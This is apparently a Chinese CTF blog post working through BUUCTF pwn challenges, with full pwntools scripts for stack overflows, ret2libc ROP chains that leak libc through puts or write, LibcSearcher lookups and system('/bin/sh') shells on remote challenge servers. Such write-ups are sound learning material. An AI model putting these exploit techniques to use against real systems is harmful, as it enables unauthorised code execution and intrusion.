【pwn学习】buuctf pwn题目(二)

下班了继续做

level0

先checksec一下




思路很简单：vulner 函数里存在栈溢出，把返回地址覆盖成 callsystem 的地址即可。



先填满 0x80 字节的缓冲区，再覆盖返回地址即可。

算了之后这种简单题就直接给payload吧

ciscn_2019_c_1（原标题误写为 n_1：下面脚本操作的二进制是 ciscn_2019_c_1，ciscn_2019_n_1 在后文单独讲）

这道题看了源码是逆向加 pwn：先把加密逻辑逆出来，剩下的就是普通的栈溢出。
逆向完就很简单了，直接 ret2libc：先用 puts 泄露 puts@got，再用 LibcSearcher 定位 libc，最后调 system("/bin/sh")。
因为是 64 位程序，第一个参数要放在 rdi 里，所以需要先找一个 pop rdi ; ret 的 gadget。
直接贴代码吧

#coding=utf8
from pwn import *
from LibcSearcher import *
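context.log_level = 'debug'
# Terminal used by gdb.attach(). The gnome-terminal assignment that used to
# precede this line was dead code (overwritten immediately), so it is gone.
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'  # flat()/u64 pack 8-byte words from here on

# 0 -> attack the remote BUUCTF instance; 1 -> run the binary locally (gdb available).
local = 0

if local:
    cn = process('./ciscn_2019_c_1')
    bin1 = ELF('./ciscn_2019_c_1', checksec=False)
else:
    cn = remote('node3.buuoj.cn', 29644)
    # got/plt offsets are read from the local copy of the challenge binary
    bin1 = ELF('./ciscn_2019_c_1')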

def z(a=''):
    """Attach gdb to the local process; does nothing against the remote target.

    `a` is a gdb command script (for example 'b*0x400AD6' followed by 'c').
    With an empty script the call blocks on raw_input() so breakpoints can
    be placed by hand before the exploit continues.
    """
    if not local:
        return
    gdb.attach(cn, a)
    if a == '':
        raw_input()

# z('b*0x0400AD6\nc')

pop_rdi = 0x00400c83   # pop rdi ; ret
main_addr = 0x0400B28  # re-entered after the leak so the overflow can be used twice
# One byte before main. Presumably a bare `ret` (last byte of the preceding
# function) used to keep rsp 16-byte aligned when system() is entered --
# confirm in the disassembly.
ret_gadget = 0x0400B27


def overflow(*chain):
    """0x50 bytes of filler, 8 bytes over the saved rbp, then the ROP chain.

    The 8 NUL bytes also terminate the input as a C string, so (assuming the
    'encrypted' prompt means the program transforms the string in place) the
    chain after them is left untouched -- verify against the binary.
    """
    return flat('A' * 0x50, 0, *chain)


def menu_choice(choice):
    """Pick a menu entry and wait for the input prompt."""
    cn.sendline(choice)
    cn.recvuntil('encrypted\n')


# Round 1: puts(puts@got) leaks a libc address, then return to main.
menu_choice('1')
cn.sendline(overflow(pop_rdi, bin1.got['puts'], bin1.plt['puts'], main_addr))
cn.recvuntil('O\n')
# NOTE(review): recvuntil('\n') cuts the leak short if one of the address
# bytes happens to be 0x0a; the printed value will then look too small -- rerun.
leaked = cn.recvuntil('\n')[:-1]
puts_addr = u64(leaked.ljust(8, '\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

# Resolve libc from the leak. LibcSearcher may match several libc builds;
# if system() crashes, check which candidate dump() picked.
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")

# Round 2: ret ; pop rdi ; system("/bin/sh")
menu_choice('1')
cn.sendline(overflow(ret_gadget, pop_rdi, str_bin_sh, system_addr))

cn.interactive()

babyrop

from pwn import *
from LibcSearcher import *
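#context.log_level = 'debug'
#p=process("./babyrop")
p = remote('node3.buuoj.cn', 26990)

elf = ELF("./babyrop")

# Stage-1 input (8 bytes). The binary is not shown here, so this is inferred
# from the layout and should be confirmed in the disassembly: the leading
# NULs end the string compare early, and the 0xff in the last byte is read
# back as the size of the next read (which is what makes the overflow possible).
CHECK_BYPASS = "\x00\x00\x00\x00" + "a" * (0x2c - 0x25 - 0x4) + "\xff"

# Stage-2 overflow: 0xE7 bytes of filler plus a fake saved ebp, then the chain.
PADDING = "a" * 0xE7 + p32(0xdeadbeef)

write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = 0x08048825


def pass_check():
    """Send the stage-1 input and wait for the 'Correct' banner.

    The same 8-byte trigger was previously pasted twice; one helper keeps the
    two rounds in sync.
    """
    p.sendline(CHECK_BYPASS)
    p.recvuntil("Correct\n")


#gdb.attach(p)
# Round 1: write(1, write@got, 4) leaks write's libc address; return to main afterwards.
pass_check()
payload = PADDING + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)
p.sendline(payload)

write_addr = u32(p.recv(4))
# Single-argument print() works on both Python 2 and 3 (the old statement form
# was Python-2-only); the label also had a missing space.
print("write_addr is " + hex(write_addr))

# LibcSearcher may match several libc builds; if system() crashes, check which
# candidate dump() picked.
libc = LibcSearcher("write", write_addr)
libc_base = write_addr - libc.dump("write")
system_addr = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")

print("libc_base is " + hex(libc_base))
print("system_addr is " + hex(system_addr))
print("str_bin_sh is " + hex(str_bin_sh))

# Round 2: system("/bin/sh"); main_addr sits where system() expects its return address.
pass_check()
payload = PADDING + p32(system_addr) + p32(main_addr) + p32(str_bin_sh)
p.sendline(payload)
p.interactive()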

ciscn_2019_n_1


关键函数里有栈溢出，把被比较的那个变量覆盖成目标值就好了。
之前没试过覆盖小数（float）。



这个值就存在缓冲区后面的那个位置，所以只要把它盖成 0x41348000（目标小数的 IEEE-754 单精度编码）就好了。


#coding=utf8
from pwn import *
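context.log_level = 'debug'
# The gnome-terminal assignment that used to precede this line was dead code
# (overwritten immediately), so only the tmux one is kept.
context.terminal = ['tmux', 'splitw', '-h']
# NOTE(review): the breakpoint address used below (0x4006A2) looks like a
# 64-bit non-PIE binary. 'i386' is kept anyway because it makes flat() pack
# integer arguments as 4 bytes, which is the width the float overwrite needs.
context.arch = 'i386'

# 1 -> run ./ciscn_2019_n_1 locally with gdb; 0 -> remote BUUCTF instance.
local = 1

if local:
    cn = process('./ciscn_2019_n_1')
else:
    cn = remote('node3.buuoj.cn', 27179)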


def z(a=''):
    """Attach gdb to the local process; does nothing against the remote target.

    `a` is a gdb command script (for example 'b*0x4006A2'). With an empty
    script the call blocks on raw_input() so breakpoints can be placed by
    hand before the exploit continues.
    """
    if not local:
        return
    gdb.attach(cn, a)
    if a == '':
        raw_input()

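# Break at the compare after the overflowing read (local runs only; no-op against remote).
z('b*0x04006A2')

# 0x41348000 is the IEEE-754 single-precision encoding of 11.28125
# (struct.unpack('<f', struct.pack('<I', 0x41348000))). The 0x2c bytes of
# filler reach the float the program compares against -- the comparison
# itself lives in the binary and is not shown here.
TARGET_FLOAT_BITS = 0x41348000
# p32() always emits exactly 4 bytes. The original flat(..., 0x41348000)
# only produced 4 bytes because context.arch happened to be 'i386'; with
# 'amd64' it would have written 8 and clobbered the next 4 bytes too.
payload = 'A' * (0x30 - 0x4) + p32(TARGET_FLOAT_BITS)

cn.sendline(payload)
cn.interactive()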

ciscn_2019_en_2

和 ciscn_2019_c_1 一样的 payload，只是程序输出的提示串不同（这里泄露前接收的是 'L \n' 而不是 'O\n'）。

#coding=utf8
from pwn import *
from LibcSearcher import *
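context.log_level = 'debug'
# Only the tmux terminal is kept; the gnome-terminal line it replaced was dead code.
context.terminal = ['tmux', 'splitw', '-h']
context.arch = 'amd64'  # flat()/u64 pack 8-byte words from here on

# 0 -> attack the remote BUUCTF instance; 1 -> run the binary locally (gdb available).
local = 0

# Both branches now use the same binary. The local branch used to run
# ./ciscn_2019_c_1 while the remote branch resolved got/plt from
# ./ciscn_2019_en_2, so a local run would have debugged a different file
# than the one the remote exploit targets.
BINARY = './ciscn_2019_en_2'

if local:
    cn = process(BINARY)
    bin1 = ELF(BINARY, checksec=False)
else:
    cn = remote('node3.buuoj.cn', 26666)
    bin1 = ELF(BINARY)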

def z(a=''):
    """Attach gdb to the local process; does nothing against the remote target.

    `a` is a gdb command script (for example 'b*0x400AD6' followed by 'c').
    With an empty script the call blocks on raw_input() so breakpoints can
    be placed by hand before the exploit continues.
    """
    if not local:
        return
    gdb.attach(cn, a)
    if a == '':
        raw_input()

# z('b*0x0400AD6\nc')

pop_rdi = 0x00400c83   # pop rdi ; ret
main_addr = 0x0400B28  # re-entered after the leak so the overflow can be used twice
# One byte before main. Presumably a bare `ret` (last byte of the preceding
# function) used to keep rsp 16-byte aligned when system() is entered --
# confirm in the disassembly.
ret_gadget = 0x0400B27


def overflow(*chain):
    """0x50 bytes of filler, 8 bytes over the saved rbp, then the ROP chain.

    The 8 NUL bytes also terminate the input as a C string, so (assuming the
    'encrypted' prompt means the program transforms the string in place) the
    chain after them is left untouched -- verify against the binary.
    """
    return flat('A' * 0x50, 0, *chain)


def menu_choice(choice):
    """Pick a menu entry and wait for the input prompt."""
    cn.sendline(choice)
    cn.recvuntil('encrypted\n')


# Round 1: puts(puts@got) leaks a libc address, then return to main.
menu_choice('1')
cn.sendline(overflow(pop_rdi, bin1.got['puts'], bin1.plt['puts'], main_addr))
cn.recvuntil('L \n')
# NOTE(review): recvuntil('\n') cuts the leak short if one of the address
# bytes happens to be 0x0a; the printed value will then look too small -- rerun.
leaked = cn.recvuntil('\n')[:-1]
puts_addr = u64(leaked.ljust(8, '\x00'))
log.success(hex(puts_addr))
cn.recvuntil('choice!\n')

# Resolve libc from the leak. LibcSearcher may match several libc builds;
# if system() crashes, check which candidate dump() picked.
libc = LibcSearcher("puts", puts_addr)
libc_base = puts_addr - libc.dump("puts")
system_addr = libc_base + libc.dump("system")
str_bin_sh = libc_base + libc.dump("str_bin_sh")

# Round 2: ret ; pop rdi ; system("/bin/sh")
menu_choice('1')
cn.sendline(overflow(ret_gadget, pop_rdi, str_bin_sh, system_addr))

cn.interactive()
